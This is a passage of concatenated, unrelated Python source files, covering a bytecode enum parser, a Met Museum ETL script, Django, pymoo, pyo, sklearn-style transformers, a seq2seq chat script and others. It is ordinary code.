RECOMMENDED_VALUE; descriptor: LTestEnum; flags: ACC_PUBLIC, ACC_STATIC, ACC_FINAL private static final TestEnum[] $VALUES; descriptor: [LTestEnum; flags: ACC_PRIVATE, ACC_STATIC, ACC_FINAL, ACC_SYNTHETIC public static TestEnum[] values(); // ... public static TestEnum valueOf(java.lang.String); // ... private TestEnum(int); // ... static {}; descriptor: ()V flags: ACC_STATIC Code: stack=5, locals=0, args_size=0 // Initializing enum constants: 0: new #5 // class TestEnum 3: dup 4: ldc #8 // String FOO 6: iconst_0 7: sipush 900 10: invokespecial #1 // Method "<init>":(Ljava/lang/String;II)V 13: putstatic #9 // Field FOO:LTestEnum; 16: new #10 // class TestEnum$1 19: dup 20: ldc #11 // String BAR 22: iconst_1 23: bipush 42 25: invokespecial #12 // Method TestEnum$1."<init>":(Ljava/lang/String;II)V 28: putstatic #13 // Field BAR:LTestEnum; 31: new #5 // class TestEnum 34: dup 35: ldc #14 // String BAZ 37: iconst_2 38: ldc #15 // String SomeSystemProperty 40: invokestatic #16 // Method java/lang/Integer.getInteger:(Ljava/lang/String;)Ljava/lang/Integer; 43: invokevirtual #17 // Method java/lang/Integer.intValue:()I 46: invokespecial #1 // Method "<init>":(Ljava/lang/String;II)V 49: putstatic #18 // Field BAZ:LTestEnum; // Setting up $VALUES 52: iconst_3 53: anewarray #5 // class TestEnum 56: dup 57: iconst_0 58: getstatic #9 // Field FOO:LTestEnum; 61: aastore 62: dup 63: iconst_1 64: getstatic #13 // Field BAR:LTestEnum; 67: aastore 68: dup 69: iconst_2 70: getstatic #18 // Field BAZ:LTestEnum; 73: aastore 74: putstatic #2 // Field $VALUES:[LTestEnum; // Other user-specified stuff 77: getstatic #13 // Field BAR:LTestEnum; 80: putstatic #19 // Field RECOMMENDED_VALUE:LTestEnum; 83: return } """ # We only care about the enum constants, not other random user stuff # (such as RECOMMENDED_VALUE) or the $VALUES thing. Fortunately, # ACC_ENUM helps us with this. It's worth noting that although MC's # obfuscater gets rid of the field names, it does not get rid of the # string constant for enum names (which is used by valueOf()), nor # does it touch ACC_ENUM. # For this method, we don't care about parameters other than the name. if not cf.access_flags.acc_enum: raise Exception(cf.this.name.value + " is not an enum!") enum_fields = list(cf.fields.find(f=lambda field: field.access_flags.acc_enum)) enum_class = None enum_name = None result = {} for ins in cf.methods.find_one(name="<clinit>").code.disassemble(): if ins == "new" and enum_class is None: const = ins.operands[0] enum_class = const.name.value elif ins in ("ldc", "ldc_w") and enum_name is None: const = ins.operands[0] if isinstance(const, String): enum_name = const.string.value elif ins == "putstatic": if enum_class is None or enum_name is None: if verbose: print("Ignoring putstatic for %s as enum_class or enum_name is unset" % str(ins)) continue const = ins.operands[0] assigned_field = const.name_and_type if not any(field.name == assigned_field.name and field.descriptor == assigned_field.descriptor for field in enum_fields): # This could happen with an enum constant that sets a field in # its constructor, which is unlikely but happens with e.g. this: """ enum Foo { FOO(i = 2); static int i; private Foo(int n) {} } """ if verbose: print("Ignoring putstatic for %s as it is to a field not in enum_fields (%s)" % (str(ins), enum_fields)) continue result[enum_name] = { 'name': enum_name, 'field': assigned_field.name.value, 'class': enum_class } enum_class = None enum_name = None if len(result) == len(enum_fields): break if verbose and len(result) != len(enum_fields): print("Did not find assignments to all enum fields - fields are %s and result is %s" % (result, enum_fields)) return result
python
""" Content Provider: Metropolitan Museum of Art ETL Process: Use the API to identify all CC0 artworks. Output: TSV file containing the image, their respective meta-data. Notes: https://metmuseum.github.io/ No rate limit specified. """ from modules.etlMods import * DELAY = 1.0 #time delay (in seconds) FILE = 'metmuseum_{}.tsv'.format(int(time.time())) logging.basicConfig(format='%(asctime)s: [%(levelname)s - Met Museum API] =======> %(message)s', level=logging.INFO) def getObjectIDs(_date=None): #Get a list of recently updated/uploaded objects. if no date is specified return all objects. objectDate = '' if _date: objectDate = '?metadataDate={}'.format(_date) endpoint = 'https://collectionapi.metmuseum.org/public/collection/v1/objects{}'.format(objectDate) result = requestContent(endpoint) if result: totalObjects = result['total'] objectIDs = result['objectIDs'] else: logging.warning('Content not available!') return None return [totalObjects, objectIDs] def getMetaData(_objectID): logging.info('Processing object: {}'.format(_objectID)) license = 'CC0' version = '1.0' imgInfo = '' imgURL = '' width = '' height = '' foreignID = '' foreignURL = '' title = '' creator = '' metaData = {} extracted = [] startTime = time.time() idx = 0 endpoint = 'https://collectionapi.metmuseum.org/public/collection/v1/objects/{}'.format(_objectID) objectData = requestContent(endpoint) if objectData is None: logging.error('Unable to process object ID: {}'.format(_objectID)) return None message = objectData.get('message') if message: logging.warning('{}: {}'.format(message, _objectID)) return None #validate CC0 license isCC0 = objectData.get('isPublicDomain') if (isCC0 is None) or (isCC0 == False): logging.warning('CC0 license not detected!') return None #get the landing page foreignURL = objectData.get('objectURL', None) if foreignURL is None: logging.warning('Landing page not detected!') return None #get the title title = objectData.get('title', '') title = sanitizeString(title) #get creator info creator = objectData.get('artistDisplayName', '') creator = sanitizeString(creator) #get the foreign identifier foreignID = _objectID #accessionNumber metaData['accession_number'] = sanitizeString(objectData.get('accessionNumber', '')) metaData['classification'] = sanitizeString(objectData.get('classification', '')) metaData['culture'] = sanitizeString(objectData.get('culture', '')) metaData['date'] = sanitizeString(objectData.get('objectDate', '')) metaData['medium'] = sanitizeString(objectData.get('medium', '')) metaData['credit_line'] = sanitizeString(objectData.get('creditLine', '')) #metaData['geography'] = objectData.get('geographyType', '') #get the image url and thumbnail imgInfo = objectData.get('primaryImage') if imgInfo is None: logging.warning('Image not detected in url {}'.format(foreignURL)) return None imgURL = imgInfo thumbnail = '' if '/original/' in imgURL: thumbnail = imgURL.replace('/original/', '/web-large/') otherImages = objectData.get('additionalImages') if len(otherImages) > 0: idx = 1 metaData['set'] = foreignURL extracted.append([ str(foreignID), foreignURL, imgURL, thumbnail, '\\N', '\\N', '\\N', license, str(version), creator, '\\N', title, json.dumps(metaData), '\\N', 'f', 'met', 'met' ]) #extract the additional images for img in otherImages: foreignID = '{}-{}'.format(_objectID, idx) imgURL = img thumbnail = '' if imgURL: if '/original/' in imgURL: thumbnail = imgURL.replace('/original/', '/web-large/') extracted.append([ str(foreignID), foreignURL, imgURL, thumbnail, '\\N', '\\N', '\\N', license, str(version), creator, '\\N', title, json.dumps(metaData), '\\N', 'f', 'met', 'met' ]) idx += 1 writeToFile(extracted, FILE) delayProcessing(startTime, DELAY) return len(extracted) def execJob(_param=None): result = getObjectIDs(_param) if result: logging.info('Total objects found: {}'.format(result[0])) extracted = map(lambda obj: getMetaData(obj), result[1]) logging.info('Total CC0 images: {}'.format(sum(filter(None, extracted)))) def main(): logging.info('Begin: Met Museum API requests') param = None mode = 'date: ' parser = argparse.ArgumentParser(description='Met Museum API Job', add_help=True) parser.add_argument('--mode', choices=['default', 'all'], help='Identify all artworks from the previous day [default] or process the entire collection [all].') parser.add_argument('--date', type=lambda dt: datetime.strptime(dt, '%Y-%m-%d'), help='Identify artworks published on a given date (format: YYYY-MM-DD).') args = parser.parse_args() if args.date: param = (args.date.strftime('%Y-%m-%d')) elif args.mode: if str(args.mode) == 'default': param = datetime.strftime(datetime.now() - timedelta(1), '%Y-%m-%d') else: mode = 'all CC0 artworks' param = None mode += param if param is not None else '' logging.info('Processing {}'.format(mode)) execJob(param) logging.info('Terminated!') if __name__ == '__main__': main()
python
import numpy as np from pymoo.experimental.deriv import DerivationBasedAlgorithm from pymoo.algorithms.base.line import LineSearchProblem from pymoo.algorithms.soo.univariate.exp import ExponentialSearch from pymoo.algorithms.soo.univariate.golden import GoldenSectionSearch from pymoo.core.population import Population from pymoo.util.vectors import max_alpha class GradientDescent(DerivationBasedAlgorithm): def direction(self, dF, **kwargs): return - dF def step(self): problem, sol = self.problem, self.opt[0] self.evaluator.eval(self.problem, sol, evaluate_values_of=["dF"]) dF = sol.get("dF")[0] print(sol) if np.linalg.norm(dF) ** 2 < 1e-8: self.termination.force_termination = True return direction = self.direction(dF) line = LineSearchProblem(self.problem, sol, direction, strict_bounds=self.strict_bounds) alpha = self.alpha if self.strict_bounds: if problem.has_bounds(): line.xu = np.array([max_alpha(sol.X, direction, *problem.bounds(), mode="all_hit_bounds")]) # remember the step length from the last run alpha = min(alpha, line.xu[0]) if alpha == 0: self.termination.force_termination = True return # make the solution to be the starting point of the univariate search x0 = sol.copy(deep=True) x0.set("__X__", x0.get("X")) x0.set("X", np.zeros(1)) # determine the brackets to be searched in exp = ExponentialSearch(delta=alpha).setup(line, evaluator=self.evaluator, termination=("n_iter", 20), x0=x0) a, b = exp.run().pop[-2:] # search in the brackets res = GoldenSectionSearch().setup(line, evaluator=self.evaluator, termination=("n_iter", 20), a=a, b=b).run() infill = res.opt[0] # set the alpha value and revert the X to be the multi-variate one infill.set("X", infill.get("__X__")) self.alpha = infill.get("alpha")[0] # keep always a few historical solutions self.pop = Population.merge(self.pop, infill)[-10:]
python
# -*- coding: utf-8 -*- # Generated by Django 1.11.3 on 2017-07-10 17:56 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('djiffy', '0001_initial'), ] operations = [ migrations.AlterModelOptions( name='canvas', options={'ordering': ['manifest', 'order'], 'permissions': (('view_manifest', 'Can view IIIF Canvas'),), 'verbose_name': 'IIIF Canvas', 'verbose_name_plural': 'IIIF Canvases'}, ), migrations.AlterModelOptions( name='manifest', options={'permissions': (('view_canvas', 'Can view IIIF Manifest'),), 'verbose_name': 'IIIF Manifest'}, ), ]
python
from django.core.management.base import BaseCommand import django.db.models.base import core.models class Command(BaseCommand): help = 'Custom manage.py command to start celery.' def add_arguments(self, parser): parser.add_argument( "needle", type=str, help="The uuid/field that you are looking for" ) def handle(self, *args, **options): needle = options.get('needle') if not needle: print "Exception: Missing value to search for" return field_type, result = find_string_in_models(core.models, needle) if not result: print "Exception:Could not find value %s in any of the imports from %s (Using %s field types)" % ( needle, core.models, field_type ) else: human_field_type = "UUID" if field_type == 'uuidfield' else 'String' if hasattr(result, 'get_source_class'): result = result.get_source_class print "%s <%s> belongs to %s %s" % ( human_field_type, needle, str(result.__class__), result ) def find_string_in_models(import_base, needle): for modelKey in import_base.__dict__.keys(): if 'pyc' not in modelKey: modelCls = getattr(import_base, modelKey) if type(modelCls) != django.db.models.base.ModelBase: continue for field in modelCls._meta.get_fields(): field_name = field.name field_type = str( modelCls._meta.get_field(field_name).get_internal_type() ).lower() if field_type in ['uuidfield', 'charfield']: res = modelCls.objects.filter(**{field_name: needle}) if res: return field_type, res.last() return (None, None)
python
from pybricks.tools import wait print("Started!") try: # Run your script here as you normally would. In this # example we just wait forever and do nothing. while True: wait(1000) except SystemExit: # This code will run when you press the stop button. # This can be useful to "clean up", such as to move # the motors back to their starting positions. print("You pressed the stop button!")
python
""" This module contains a set of functions related to strings > > strcat : String concatenation for a 1xN list > strcat_array : String concatenation for a MxN array > strrep : String replacement for array > repmat : Repeat char NxM times > find : Find the location of a input character in a string EXAMPLE -------------------------------------------------------------------------- Name : strtricks.py Author : E.Taskesen Contact : [email protected] Date : Sep. 2017 -------------------------------------------------------------------------- """ #%% Libraries import pandas as pd import numpy as np import re #%% Concatenates list # INPUT: List of strings or char: string=["aap","boom","mies"] or string="aap" def strcat(string,delim=" "): out = '' if (type(string)==list): out=delim.join(list(string)) else: out = string+delim #end # Remove last delim char #out=out[0:len(out)-len(delim)] # Return return out #%% Concatenates pandas array def strcat_array(data,delim=","): out=data.astype(str).apply(lambda x: delim.join(x), axis=1) # Remove first delim # out=out[1:len(out)] return out #%% Changes char over list def strrep(out,strFrom, strTo): for i in range(0,len(out)): out[i]=out[i].replace(strFrom,strTo) # return return out #%% Replaces [char] or [string] to [NaN] in full pandas dataframe def strrep_to_nan(out,strFrom): out = out.apply(lambda x: x.str.strip()).replace(strFrom, np.nan) # return return out #%% Repeat str for #rows and #cols def repmat(getstr, rows, cols): # INPUT: repmat("?", 10, 5): # OUTPUT: Pandas dataframe # Convert to list: out = out.values.tolist()[0] # # Multiplyl str out = [getstr] * rows # Multiple rows out = [out] * cols # Convert to pandas dataframe out = pd.DataFrame(out) # return return out #%% Find char in string and return indexes def find(getstr, ch): return [i for i, ltr in enumerate(getstr) if ltr == ch] #%%
python
from checkov.terraform.context_parsers.base_parser import BaseContextParser class ResourceContextParser(BaseContextParser): def __init__(self): definition_type = 'resource' super().__init__(definition_type=definition_type) def get_block_type(self): return self.definition_type parser = ResourceContextParser()
python
''' Por algum motivo desconhecido, Rangel só tem um par de meias de cada cor. Hoje ele está atrasado para ir a faculdade e ainda precisa pegar um par de meias, mas as meias estão todas bagunçadas. Dado o número de pares de meias na gaveta de Rangel, ele quer saber quantas meias ele precisa pegar, no mínimo, para ter pelo menos um par da mesma cor. Entrada Cada caso é composto de um único inteiro N (1 ≤ N ≤ 105) que corresponde a quantidade de pares de meias na gaveta. Saída Você deve imprimir uma linha com um único inteiro que corresponde a quantidade mínima de meias que Rangel precisa pegar. ''' print(int(input())+1)
python
""" KGE Web User Interface Application Code package. """ from os import getenv, path import logging from kgea.server.web_services.kgea_session import KgeaSession import jinja2 import aiohttp_jinja2 from aiohttp import web import aiohttp_cors from .kgea_ui_handlers import ( kge_landing_page, kge_login, kge_client_authentication, get_kge_home, kge_logout, get_kge_graph_registration_form, view_kge_metadata, get_kge_fileset_registration_form, get_kge_file_upload_form, get_kge_fileset_submitted, get_kge_data_unavailable ) async def make_app(): """ :return: """ app = web.Application() # Configure Jinja2 template map templates_dir = path.join(path.dirname(__file__), 'templates') aiohttp_jinja2.setup(app, loader=jinja2.FileSystemLoader(templates_dir)) app.router.add_get('/', kge_landing_page) app.router.add_get('/login', kge_login) app.router.add_get('/oauth2callback', kge_client_authentication) app.router.add_get('/home', get_kge_home) app.router.add_get('/logout', kge_logout) app.router.add_get('/register/graph', get_kge_graph_registration_form) app.router.add_get('/metadata', view_kge_metadata) app.router.add_get('/register/fileset', get_kge_fileset_registration_form) app.router.add_get('/upload', get_kge_file_upload_form) app.router.add_get('/submitted', get_kge_fileset_submitted) app.router.add_get('/unavailable', get_kge_data_unavailable) app.router.add_static('/css/', path=templates_dir + '/css', name='css') app.router.add_static('/images/', path=templates_dir + '/images', name='images') # Enable CORS for all origins. cors = aiohttp_cors.setup(app, defaults={ "*": aiohttp_cors.ResourceOptions( allow_credentials=True, expose_headers="*", allow_headers="*", allow_methods="*" ) }) # Register all routers for CORS. for route in list(app.router.routes()): cors.add(route) KgeaSession.initialize(app) return app def main(): """ Main application entry point. """ # Master flag for local development runs bypassing # authentication and other production processes DEV_MODE = getenv('DEV_MODE', default=False) if DEV_MODE: logging.basicConfig(level=logging.DEBUG) web.run_app(make_app(), port=8090) KgeaSession.close_global_session()
python
""" 05-strange-attractors.py - Non-linear ordinary differential equations. Oscilloscope part of the tutorial --------------------------------- A strange attractor is a system of three non-linear ordinary differential equations. These differential equations define a continuous-time dynamical system that exhibits chaotic dynamics associated with the fractal properties of the attractor. There is three strange attractors in the library, the Rossler, the Lorenz and the ChenLee objects. Each one can output stereo signal if the `stereo` argument is set to True. Use the "voice" slider of the window "Input interpolator" to interpolate between the three sources. Audio part of the tutorial -------------------------- It's possible to create very interesting LFO with strange attractors. The last part of this tutorial shows the use of Lorenz's output to drive the frequency of two sine wave oscillators. """ from pyo import * s = Server().boot() ### Oscilloscope ### # LFO applied to the `chaos` attribute lfo = Sine(0.2).range(0, 1) # Rossler attractor n1 = Rossler(pitch=0.5, chaos=lfo, stereo=True) # Lorenz attractor n2 = Lorenz(pitch=0.5, chaos=lfo, stereo=True) # ChenLee attractor n3 = ChenLee(pitch=0.5, chaos=lfo, stereo=True) # Interpolates between input objects to produce a single output sel = Selector([n1, n2, n3]) sel.ctrl(title="Input interpolator (0=Rossler, 1=Lorenz, 2=ChenLee)") # Displays the waveform of the chosen attractor sc = Scope(sel) ### Audio ### # Lorenz with very low pitch value that acts as a LFO freq = Lorenz(0.005, chaos=0.7, stereo=True, mul=250, add=500) a = Sine(freq, mul=0.3).out() s.gui(locals())
python
# -*- coding: utf-8 -*- import struct from io import BytesIO class Buffer(BytesIO): """ A buffer-like object with shortcut methods to read C objects """ def __read(self, size: int, unpack=None): res = self.read(size) if unpack: res = struct.unpack(unpack, res)[0] return res def read_char(self, size=1) -> bytes: """ Read `size` char(s) from the buffer and move the cursor :param size: the number of char(s) to read :return: a bytes instance """ return self.__read(size) def read_uint8(self) -> int: """ Read an unsigned int8 from the buffer and move the cursor :return: a positive integer """ return self.__read(1, "<B") def read_uint32(self) -> int: """ Read an unsigned int32 from the buffer and move the cursor :return: a positive integer """ return self.__read(4, "<I") def read_ushort(self) -> int: """ Read an unsigned short from the buffer and move the cursor :return: a positive integer """ return self.__read(2, "<H") def read_float(self) -> float: """ Read a float from the buffer and move the cursor :return: a float number """ return self.__read(4, "<f") def skip(self, size: int) -> None: """ Skip the next `size` bytes by moving the cursor :param size: number of bytes to skip """ self.__read(size)
python
"""Saturation classes.""" from __future__ import annotations from abc import ABC, abstractmethod import numpy as np from sklearn.base import BaseEstimator, TransformerMixin from sklearn.utils.validation import check_is_fitted, check_array class Saturation(BaseEstimator, TransformerMixin, ABC): """Base class for all saturations, such as Box-Cox, Adbudg, ...""" def fit(self, X: np.ndarray, y: None = None) -> Saturation: """ Fit the transformer. In this special case, nothing is done. Parameters ---------- X : Ignored Not used, present here for API consistency by convention. y : Ignored Not used, present here for API consistency by convention. Returns ------- Saturation Fitted transformer. """ X = check_array(X) self._check_n_features(X, reset=True) return self def transform(self, X: np.ndarray) -> np.ndarray: """ Apply the saturation effect. Parameters ---------- X : np.ndarray Data to be transformed. Returns ------- np.ndarray Data with saturation effect applied. """ check_is_fitted(self) X = check_array(X) self._check_n_features(X, reset=False) return self._transformation(X) @abstractmethod def _transformation(self, X: np.ndarray) -> np.ndarray: """Generate the transformation formula.""" class BoxCoxSaturation(Saturation): """ Apply the Box-Cox saturation. The formula is ((x + shift) ** exponent-1) / exponent if exponent!=0, else ln(x+shift). Parameters ---------- exponent: float, default=1.0 The exponent. shift : float, default=1.0 The shift. Examples -------- >>> import numpy as np >>> X = np.array([[1, 1000], [2, 1000], [3, 1000]]) >>> BoxCoxSaturation(exponent=0.5).fit_transform(X) array([[ 0.82842712, 61.27716808], [ 1.46410162, 61.27716808], [ 2. , 61.27716808]]) """ def __init__(self, exponent: float = 1.0, shift: float = 1.0) -> None: """Initialize.""" self.exponent = exponent self.shift = shift def _transformation(self, X: np.ndarray) -> np.ndarray: """Generate the transformation formula.""" if self.exponent != 0: return ((X + self.shift) ** self.exponent - 1) / self.exponent else: return np.log(X + self.shift) class AdbudgSaturation(Saturation): """ Apply the Adbudg saturation. The formula is x ** exponent / (denominator_shift + x ** exponent). Parameters ---------- exponent : float, default=1.0 The exponent. denominator_shift : float, default=1.0 The shift in the denominator. Notes ----- This version produces saturated values in the interval [0, 1]. You can use `LinearShift` from the shift module to bring it between some interval [a, b]. Examples -------- >>> import numpy as np >>> X = np.array([[1, 1000], [2, 1000], [3, 1000]]) >>> AdbudgSaturation().fit_transform(X) array([[0.5 , 0.999001 ], [0.66666667, 0.999001 ], [0.75 , 0.999001 ]]) """ def __init__(self, exponent: float = 1.0, denominator_shift: float = 1.0) -> None: """Initialize.""" self.exponent = exponent self.denominator_shift = denominator_shift def _transformation(self, X: np.ndarray) -> np.ndarray: """Generate the transformation formula.""" return X ** self.exponent / (self.denominator_shift + X ** self.exponent) class HillSaturation(Saturation): """ Apply the Hill saturation. The formula is 1 / (1 + (half_saturation / x) ** exponent). Parameters ---------- exponent : float, default=1.0 The exponent. half_saturation : float, default=1.0 The point of half saturation, i.e. Hill(half_saturation) = 0.5. Examples -------- >>> import numpy as np >>> X = np.array([[1, 1000], [2, 1000], [3, 1000]]) >>> HillSaturation().fit_transform(X) array([[0.5 , 0.999001 ], [0.66666667, 0.999001 ], [0.75 , 0.999001 ]]) """ def __init__(self, exponent: float = 1.0, half_saturation: float = 1.0) -> None: """Initialize.""" self.half_saturation = half_saturation self.exponent = exponent def _transformation(self, X: np.ndarray) -> np.ndarray: """Generate the transformation formula.""" eps = np.finfo(np.float64).eps return 1 / (1 + (self.half_saturation / (X + eps)) ** self.exponent) class ExponentialSaturation(Saturation): """ Apply exponential saturation. The formula is 1 - exp(-exponent * x). Parameters ---------- exponent : float, default=1.0 The exponent. Notes ----- This version produces saturated values in the interval [0, 1]. You can use `LinearShift` from the shift module to bring it between some interval [a, b]. Examples -------- >>> import numpy as np >>> X = np.array([[1, 1000], [2, 1000], [3, 1000]]) >>> ExponentialSaturation().fit_transform(X) array([[0.63212056, 1. ], [0.86466472, 1. ], [0.95021293, 1. ]]) """ def __init__(self, exponent: float = 1.0) -> None: """Initialize.""" self.exponent = exponent def _transformation(self, X: np.ndarray) -> np.ndarray: """Generate the transformation formula.""" return 1 - np.exp(-self.exponent * X)
python
from dsbox.template.template import DSBoxTemplate from d3m.metadata.problem import TaskKeyword from dsbox.template.template_steps import TemplateSteps from dsbox.schema import SpecializedProblem import typing import numpy as np # type: ignore class UMASSClassificationTemplate(DSBoxTemplate): def __init__(self): DSBoxTemplate.__init__(self) self.template = { "name": "UMASS_classification_template", "taskSubtype": {TaskKeyword.MULTICLASS.name}, "taskType": TaskKeyword.CLASSIFICATION.name, "inputType": "table", # See SEMANTIC_TYPES.keys() for range of values "output": "model_step", # Name of the final step generating the prediction "target": "extract_target_step", # Name of the step generating the ground truth "steps": TemplateSteps.dsbox_generic_steps() + TemplateSteps.dsbox_feature_selector("classification", first_input='data', second_input='target') + [ { "name": "model_step", "primitives": "d3m.primitives.classification.multilabel_classifier.DSBOX", "inputs": ["data, target"] } ] }
python
''' This script handles local interactive inference ''' import torch import torch.nn as nn import torch.nn.functional as F import argparse import numpy as np import spacy from seq2seq.Models import Seq2Seq from seq2seq.Translator import Translator from seq2seq.Beam import Beam from seq2seq import Constants class Interactive(Translator): def __init__(self, opt): super().__init__(opt) def translate_batch(self, src_seq, src_pos): ''' Translation work in one batch ''' def get_inst_idx_to_tensor_position_map(inst_idx_list): ''' Indicate the position of an instance in a tensor. ''' return {inst_idx: tensor_position for tensor_position, inst_idx in enumerate(inst_idx_list)} def collect_active_part(beamed_tensor, curr_active_inst_idx, n_prev_active_inst, n_bm): ''' Collect tensor parts associated to active instances. ''' _, *d_hs = beamed_tensor.size() n_curr_active_inst = len(curr_active_inst_idx) new_shape = (n_curr_active_inst * n_bm, *d_hs) beamed_tensor = beamed_tensor.view(n_prev_active_inst, -1) beamed_tensor = beamed_tensor.index_select(0, curr_active_inst_idx) beamed_tensor = beamed_tensor.view(*new_shape) return beamed_tensor def collate_active_info( src_seq, src_enc, inst_idx_to_position_map, active_inst_idx_list): #- Active sentences are collected so the decoder will not run on completed sentences n_prev_active_inst = len(inst_idx_to_position_map) active_inst_idx = [inst_idx_to_position_map[k] for k in active_inst_idx_list] active_inst_idx = torch.LongTensor(active_inst_idx).to(self.device) active_src_seq = collect_active_part(src_seq, active_inst_idx, n_prev_active_inst, n_bm) active_src_enc = collect_active_part(src_enc, active_inst_idx, n_prev_active_inst, n_bm) active_inst_idx_to_position_map = get_inst_idx_to_tensor_position_map(active_inst_idx_list) return active_src_seq, active_src_enc, active_inst_idx_to_position_map def beam_decode_step( inst_dec_beams, len_dec_seq, src_seq, enc_output, inst_idx_to_position_map, n_bm): ''' Decode and update beam status, and then return active beam idx ''' def prepare_beam_dec_seq(inst_dec_beams, len_dec_seq): dec_partial_seq = [b.get_current_state() for b in inst_dec_beams if not b.done] dec_partial_seq = torch.stack(dec_partial_seq).to(self.device) dec_partial_seq = dec_partial_seq.view(-1, len_dec_seq) return dec_partial_seq def prepare_beam_dec_pos(len_dec_seq, n_active_inst, n_bm): dec_partial_pos = torch.arange(1, len_dec_seq + 1, dtype=torch.long, device=self.device) dec_partial_pos = dec_partial_pos.unsqueeze(0).repeat(n_active_inst * n_bm, 1) return dec_partial_pos def predict_word(dec_seq, dec_pos, src_seq, enc_output, n_active_inst, n_bm): dec_output, *_ = self.model.decoder(dec_seq, dec_pos, src_seq, enc_output) dec_output = dec_output[:, -1, :] # Pick the last step: (bh * bm) * d_h word_prob = self.model.tgt_word_prj(dec_output) word_prob[:, Constants.UNK] = -float('inf') word_prob = F.log_softmax(word_prob, dim=1) word_prob = word_prob.view(n_active_inst, n_bm, -1) return word_prob def collect_active_inst_idx_list(inst_beams, word_prob, inst_idx_to_position_map): active_inst_idx_list = [] for inst_idx, inst_position in inst_idx_to_position_map.items(): is_inst_complete = inst_beams[inst_idx].advance(word_prob[inst_position]) if not is_inst_complete: active_inst_idx_list += [inst_idx] return active_inst_idx_list n_active_inst = len(inst_idx_to_position_map) dec_seq = prepare_beam_dec_seq(inst_dec_beams, len_dec_seq) dec_pos = prepare_beam_dec_pos(len_dec_seq, n_active_inst, n_bm) word_prob = predict_word(dec_seq, dec_pos, src_seq, enc_output, n_active_inst, n_bm) # Update the beam with predicted word prob information and collect incomplete instances active_inst_idx_list = collect_active_inst_idx_list( inst_dec_beams, word_prob, inst_idx_to_position_map) return active_inst_idx_list def collect_hypothesis_and_scores(inst_dec_beams, n_best): all_hyp, all_scores = [], [] for inst_idx in range(len(inst_dec_beams)): scores, tail_idxs = inst_dec_beams[inst_idx].sort_scores() all_scores += [scores[:n_best]] hyps = [inst_dec_beams[inst_idx].get_hypothesis(i) for i in tail_idxs[:n_best]] all_hyp += [hyps] return all_hyp, all_scores with torch.no_grad(): #- Zero out hidden state to batch size 1 self.model.session.zero_lstm_state(1, self.device) #- Encode src_enc, *_ = self.model.encoder(src_seq, src_pos) src_enc, *_ = self.model.session(src_enc) #- Repeat data for beam search n_bm = self.opt.beam_size n_inst, len_s, d_h = src_enc.size() src_seq = src_seq.repeat(1, n_bm).view(n_inst * n_bm, len_s) src_enc = src_enc.repeat(1, n_bm, 1).view(n_inst * n_bm, len_s, d_h) #- Prepare beams inst_dec_beams = [Beam(n_bm, device=self.device) for _ in range(n_inst)] #- Bookkeeping for active or not active_inst_idx_list = list(range(n_inst)) inst_idx_to_position_map = get_inst_idx_to_tensor_position_map(active_inst_idx_list) #- Decode for len_dec_seq in range(1, self.model_opt.max_subseq_len + 1): active_inst_idx_list = beam_decode_step( inst_dec_beams, len_dec_seq, src_seq, src_enc, inst_idx_to_position_map, n_bm) if not active_inst_idx_list: break # all instances have finished their path to <EOS> src_seq, src_enc, inst_idx_to_position_map = collate_active_info( src_seq, src_enc, inst_idx_to_position_map, active_inst_idx_list) hyp, scores = collect_hypothesis_and_scores(inst_dec_beams, self.opt.n_best) return hyp, scores def interactive(opt): def prepare_seq(seq, max_seq_len, word2idx, device): ''' Prepares sequence for inference ''' seq = nlp(seq) seq = [token.text for token in seq[:max_seq_len]] seq = [word2idx.get(w.lower(), Constants.UNK) for w in seq] seq = [Constants.BOS] + seq + [Constants.EOS] seq = np.array(seq + [Constants.PAD] * (max_seq_len - len(seq))) pos = np.array([pos_i+1 if w_i != Constants.PAD else 0 for pos_i, w_i in enumerate(seq)]) seq = torch.LongTensor(seq).unsqueeze(0) pos = torch.LongTensor(pos).unsqueeze(0) return seq.to(device), pos.to(device) #- Load preprocessing file for vocabulary prepro = torch.load(opt.prepro_file) src_word2idx = prepro['dict']['src'] tgt_idx2word = {idx: word for word, idx in prepro['dict']['tgt'].items()} del prepro # to save memory #- Prepare interactive shell nlp = spacy.blank('en') s2s = Interactive(opt) max_seq_len = s2s.model_opt.max_subseq_len print('[Info] Model opts: {}'.format(s2s.model_opt)) #- Interact with console console_input = '' console_output = '[Seq2Seq](score:--.--) human , what do you have to say ( type \' exit \' to quit ) ?\n[Human] ' while True: console_input = input(console_output) # get user input if console_input == 'exit': break seq, pos = prepare_seq(console_input, max_seq_len, src_word2idx, s2s.device) console_output, score = s2s.translate_batch(seq, pos) console_output = console_output[0][0] score = score[0][0] console_output = '[Seq2Seq](score:{score:2.2f}) '.format(score=score.item()) + \ ' '.join([tgt_idx2word.get(word, Constants.UNK_WORD) for word in console_output]) + '\n[Human] ' print('[Seq2Seq](score:--.--) thanks for talking with me !') if __name__ == "__main__": parser = argparse.ArgumentParser(description='translate.py') parser.add_argument('-model', required=True, help='Path to model .chkpt file') parser.add_argument('-prepro_file', required=True, help='Path to preprocessed data for vocab') parser.add_argument('-beam_size', type=int, default=5, help='Beam size') parser.add_argument('-no_cuda', action='store_true') opt = parser.parse_args() opt.cuda = not opt.no_cuda opt.n_best = 1 interactive(opt)
python
"""Tests for encodings submodule.""" from nxviz import encodings as aes import pytest import pandas as pd from random import choice import numpy as np def categorical_series(): """Generator for categorical series.""" categories = "abc" return pd.Series([choice(categories) for _ in range(30)]) def continuous_series(): """Generator for continuous-valued series.""" values = np.linspace(0, 2, 100) return pd.Series(values) def ordinal_series(): """Generator for an ordinal series.""" values = [1, 2, 3, 4] return pd.Series(values) @pytest.fixture def too_many_categories(): """Generator for an categorical series with too many categories.""" categories = list("abcdeefghijklmnop") return pd.Series(categories) @pytest.mark.parametrize( "data, category", [ (categorical_series(), "categorical"), (continuous_series(), "continuous"), (ordinal_series(), "ordinal"), ], ) def test_data_cmap(data, category): """Test data_cmap.""" cmap, data_family = aes.data_cmap(data) assert data_family == category def test_data_cmap_errors(too_many_categories): """Test that data_cmap errors with too man categories.""" with pytest.raises(ValueError): aes.data_cmap(too_many_categories) @pytest.mark.parametrize( "data", [ (categorical_series()), (continuous_series()), (ordinal_series()), ], ) def test_data_color(data): """Test data_color.""" colors = aes.data_color(data, data) assert isinstance(colors, pd.Series) @pytest.mark.parametrize( "data", [ (continuous_series()), (ordinal_series()), ], ) def test_data_size(data): """Test data_size.""" sizes = aes.data_size(data, data) assert isinstance(sizes, pd.Series) assert np.allclose(sizes, np.sqrt(data)) @pytest.mark.parametrize( "data", [ (continuous_series()), 